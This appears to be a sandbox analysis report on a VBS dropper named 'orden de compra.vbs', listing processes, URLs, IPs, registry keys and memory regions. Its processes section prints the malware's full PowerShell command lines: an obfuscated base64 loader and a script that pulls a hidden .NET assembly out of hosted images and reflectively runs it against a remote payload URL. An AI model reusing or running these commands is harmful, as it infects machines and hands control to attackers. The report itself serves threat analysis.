Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
orden de compra.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\gK5wA[1].txt
|
Unicode text, UTF-8 text, with very long lines (11321), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4dl4nswl.53v.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ahaqvm4s.lqx.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mqudndbs.ssr.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tfponxrb.j0s.ps1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\orden de compra.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreMDgTreDgTrevDgTreDDgTreDgTreNDgTreDgTrezDgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTre2DgTreDDgTreDgTreLwDgTrewDgTreDQDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre4DgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreEYDgTrecgBvDgTreG0DgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreUwBUDgTreEEDgTreUgBUDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBFDgTreE4DgTreRDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCDgTreDgTrePQDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBTDgTreHUDgTreYgBzDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTresDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTreUDgTreBSDgTreE8DgTreSgBFDgTreFQDgTreTwBBDgTreFUDgTreVDgTreBPDgTreE0DgTreQQBDDgTreEEDgTreTwDgTreuDgTreFYDgTreQgDgTreuDgTreEgDgTrebwBtDgTreGUDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreG0DgTreZQB0DgTreGgDgTrebwBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTreuDgTreEcDgTreZQB0DgTreE0DgTreZQB0DgTreGgDgTrebwBkDgTreCgDgTreJwBWDgTreEEDgTreSQDgTrenDgTreCkDgTreLgBJDgTreG4DgTredgBvDgTreGsDgTreZQDgTreoDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTresDgTreCDgTreDgTreWwBvDgTreGIDgTreagBlDgTreGMDgTredDgTreBbDgTreF0DgTreXQDgTregDgTreCgDgTreJwB0DgTreHgDgTredDgTreDgTreuDgTreG8DgTrecgBiDgTreG8DgTreeQDgTrevDgTreDQDgTreNQDgTrexDgTreC4DgTreMwDgTre0DgTreDIDgTreLgDgTrezDgTreC4DgTreMgDgTre5DgTreDEDgTreLwDgTrevDgTreDoDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCwDgTreJwBBDgTreGQDgTreZDgTreBJDgTreG4DgTreUDgTreByDgTreG8DgTreYwBlDgTreHMDgTrecwDgTrezDgTreDIDgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd
= [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe
-windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command
"function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData =
@(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData
+= $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887',
'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imageBytes = DownloadDataFromLinks
$links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>';
$endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex
-ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command
= $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly
= [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method
= $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.orboy/451.342.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))}
}"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://192.3.243.154/yobro.txt
|
192.3.243.154
|
|
|
|
https://uploaddeimagens.com.br/
|
unknown
|
|
|
|
https://uploaddeimagens.com.br
|
unknown
|
|
|
|
https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887
|
104.21.45.138
|
|
|
|
https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888
|
104.21.45.138
|
|
|
|
https://paste.ee/d/gK5wA
|
104.21.84.67
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://account.dyn.com/
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://www.google.com;
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://paste.ee/d/gK5wA;
|
unknown
|
||
|
https://analytics.paste.ee
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://paste.ee/d/gK5wAR
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://ip-api.com
|
unknown
|
||
|
https://paste.ee/
|
unknown
|
||
|
https://analytics.paste.ee;
|
unknown
|
||
|
https://cdnjs.cloudflare.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://cdnjs.cloudflare.com;
|
unknown
|
||
|
http://192.3.243.154
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://secure.gravatar.com
|
unknown
|
||
|
https://themes.googleusercontent.com
|
unknown
|
||
|
http://ip-api.com/line/?fields=hosting
|
208.95.112.1
|
There are 22 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
uploaddeimagens.com.br
|
104.21.45.138
|
|
|
|
paste.ee
|
104.21.84.67
|
||
|
ip-api.com
|
208.95.112.1
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
104.21.45.138
|
uploaddeimagens.com.br
|
United States
|
|
|
|
192.3.243.154
|
unknown
|
United States
|
|
|
|
208.95.112.1
|
ip-api.com
|
United States
|
||
|
104.21.84.67
|
paste.ee
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
FileDirectory
|
There are 19 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
402000
|
remote allocation
|
page execute and read and write
|
|
|
|
2262FB84000
|
heap
|
page read and write
|
||
|
DA7000
|
trusted library allocation
|
page execute and read and write
|
||
|
2262D0FC000
|
heap
|
page read and write
|
||
|
71CB1B9000
|
stack
|
page read and write
|
||
|
71CACFD000
|
stack
|
page read and write
|
||
|
1EC7643D000
|
heap
|
page read and write
|
||
|
2262EEA8000
|
heap
|
page read and write
|
||
|
2262F2B2000
|
heap
|
page read and write
|
||
|
1F406200000
|
heap
|
page execute and read and write
|
||
|
B00000
|
heap
|
page read and write
|
||
|
1EC00001000
|
trusted library allocation
|
page read and write
|
||
|
1F4078C7000
|
trusted library allocation
|
page read and write
|
||
|
2A25000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B810000
|
trusted library allocation
|
page execute and read and write
|
||
|
43E000
|
remote allocation
|
page execute and read and write
|
||
|
1EC76A20000
|
heap
|
page read and write
|
||
|
6277000
|
trusted library allocation
|
page read and write
|
||
|
1EC74640000
|
heap
|
page read and write
|
||
|
1EC00121000
|
trusted library allocation
|
page read and write
|
||
|
2262F2D9000
|
heap
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
2262FA04000
|
heap
|
page read and write
|
||
|
2262F333000
|
heap
|
page read and write
|
||
|
2262D108000
|
heap
|
page read and write
|
||
|
1F40D606000
|
trusted library allocation
|
page read and write
|
||
|
74A000
|
stack
|
page read and write
|
||
|
62A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F4046FF000
|
heap
|
page read and write
|
||
|
2262D0E0000
|
heap
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
541E000
|
stack
|
page read and write
|
||
|
6250000
|
trusted library allocation
|
page execute and read and write
|
||
|
4FE0000
|
heap
|
page read and write
|
||
|
1F406110000
|
heap
|
page readonly
|
||
|
1EC0056B000
|
trusted library allocation
|
page read and write
|
||
|
1EC74790000
|
heap
|
page read and write
|
||
|
49F8000
|
trusted library allocation
|
page read and write
|
||
|
CB5000
|
heap
|
page read and write
|
||
|
2262D06E000
|
heap
|
page read and write
|
||
|
2262D13E000
|
heap
|
page read and write
|
||
|
71CB079000
|
stack
|
page read and write
|
||
|
1F40D5AE000
|
trusted library allocation
|
page read and write
|
||
|
1F4047AA000
|
heap
|
page read and write
|
||
|
7FFD9B8D2000
|
trusted library allocation
|
page read and write
|
||
|
1F408E41000
|
trusted library allocation
|
page read and write
|
||
|
10D0000
|
trusted library allocation
|
page read and write
|
||
|
2262D189000
|
heap
|
page read and write
|
||
|
2262EE9C000
|
heap
|
page read and write
|
||
|
9EA41BE000
|
stack
|
page read and write
|
||
|
4EEA000
|
trusted library allocation
|
page read and write
|
||
|
2262D130000
|
heap
|
page read and write
|
||
|
1EC76516000
|
heap
|
page read and write
|
||
|
2262F140000
|
heap
|
page read and write
|
||
|
2262F060000
|
heap
|
page read and write
|
||
|
1F416A4B000
|
trusted library allocation
|
page read and write
|
||
|
1F4082C7000
|
trusted library allocation
|
page read and write
|
||
|
1EC74478000
|
heap
|
page read and write
|
||
|
B9F000
|
heap
|
page read and write
|
||
|
1EC744F0000
|
heap
|
page read and write
|
||
|
2262EEB5000
|
heap
|
page read and write
|
||
|
6260000
|
trusted library allocation
|
page read and write
|
||
|
1EC005A9000
|
trusted library allocation
|
page read and write
|
||
|
1F406B36000
|
trusted library allocation
|
page read and write
|
||
|
2262D065000
|
heap
|
page read and write
|
||
|
1F40D5A6000
|
trusted library allocation
|
page read and write
|
||
|
2262EE90000
|
heap
|
page read and write
|
||
|
D90000
|
trusted library allocation
|
page read and write
|
||
|
2262FB84000
|
heap
|
page read and write
|
||
|
2262D142000
|
heap
|
page read and write
|
||
|
2262FA82000
|
heap
|
page read and write
|
||
|
9EA44BE000
|
stack
|
page read and write
|
||
|
2262F370000
|
heap
|
page read and write
|
||
|
2262D06E000
|
heap
|
page read and write
|
||
|
BBB000
|
heap
|
page read and write
|
||
|
1EC764BD000
|
heap
|
page read and write
|
||
|
60FE000
|
stack
|
page read and write
|
||
|
1EC76490000
|
heap
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
9EA3E7E000
|
stack
|
page read and write
|
||
|
1EC7650B000
|
heap
|
page read and write
|
||
|
1EC746F0000
|
heap
|
page read and write
|
||
|
1EC10010000
|
trusted library allocation
|
page read and write
|
||
|
2262FB8D000
|
heap
|
page read and write
|
||
|
1F4047B8000
|
heap
|
page read and write
|
||
|
1F40470B000
|
heap
|
page read and write
|
||
|
9EA453B000
|
stack
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page read and write
|
||
|
1F406751000
|
trusted library allocation
|
page read and write
|
||
|
1F404890000
|
heap
|
page read and write
|
||
|
1EC76420000
|
heap
|
page read and write
|
||
|
71CBE8E000
|
stack
|
page read and write
|
||
|
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
|
2262EEB4000
|
heap
|
page read and write
|
||
|
D92000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B890000
|
trusted library allocation
|
page read and write
|
||
|
1EC0012E000
|
trusted library allocation
|
page read and write
|
||
|
